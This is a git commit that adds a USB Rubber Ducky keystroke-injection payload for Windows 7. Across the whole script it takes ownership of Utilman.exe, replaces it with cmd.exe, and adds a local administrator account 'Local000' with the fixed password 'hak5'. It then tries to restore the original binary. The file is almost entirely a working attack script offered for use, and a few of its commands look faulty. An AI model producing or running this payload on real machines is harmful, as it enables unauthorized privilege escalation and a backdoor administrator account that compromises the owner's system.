Created Payload utilman exploit (rdoc)
This commit is contained in:
parent
55d4fc21ba
commit
0f31c4750f
|
@ -0,0 +1,95 @@
|
|||
Author: Xcellerator (props to Jay Kruer's Fork Bomb script for the UAC bypass technique!)
|
||||
Duckencoder: 1.0
|
||||
Target: Windows 7
|
||||
Description: Uses the Utilman.exe Exploit to create a new local administrator account “Local000” with the password “hak5”.
|
||||
REM Author: Xcellerator
|
||||
REM Description: Utilman Exploiter to create a new Admin Account
|
||||
REM The new account will be called "Local000".
|
||||
GUI
|
||||
DELAY 50
|
||||
STRING cmd
|
||||
MENU
|
||||
STRING a
|
||||
ENTER
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 200
|
||||
STRING takeown /f "%systemroot%\System32\Utilman.exe"
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING cd %systemroot%\System32
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING mkdir util
|
||||
ENTER
|
||||
STRING xcopy cmd.exe util\
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING ren Utilman.exe Utilman.exe.bak
|
||||
ENTER
|
||||
STRING cd util
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING ren cmd.exe Utilman.exe
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING cd ..
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING xcopy util/Utilman.exe \
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING rmdir /s /q util
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING exit
|
||||
ENTER
|
||||
DELAY 50
|
||||
GUI u
|
||||
STRING net user Local000 /add
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING net localgroup administrators Local000 /add
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING exit
|
||||
ENTER
|
||||
DELAY 50
|
||||
GUI r
|
||||
STRING cmd
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING cd "%systemroot%\System32"
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING delete Utilman.exe
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING y
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING ren Utilman.exe.bak Utilman.exe
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING exit
|
||||
ENTER
|
||||
GUI
|
||||
STRING cmd
|
||||
MENU
|
||||
STRING a
|
||||
ENTER
|
||||
DELAY 50
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 200
|
||||
STRING net user Local000 *
|
||||
ENTER
|
||||
STRING hak5
|
||||
ENTER
|
||||
STRING hak5
|
||||
ENTER
|
||||
STRING exit
|
||||
ENTER
|
Loading…
Reference in New Issue